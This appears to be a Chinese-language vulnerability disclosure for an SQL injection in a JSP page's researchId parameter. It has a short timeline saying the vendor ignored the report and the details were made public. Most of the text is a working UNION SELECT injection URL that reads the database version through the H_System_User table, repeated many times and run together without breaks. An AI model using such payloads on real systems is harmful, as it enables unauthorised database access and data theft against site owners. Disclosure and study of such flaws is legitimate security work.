2015-11-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-23: 厂商已经主动忽略漏洞,细节向公众公开
SQL注入漏洞文件位置:
/main/model/childcatalog/researchinfo_dan.jsp?researchId=1
http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--
#1:
http://**.**.**.**/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--
#2:
http://**.**.**.**//main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,@@version,3%20from%20H_System_User--
未能联系到厂商或者厂商积极拒绝
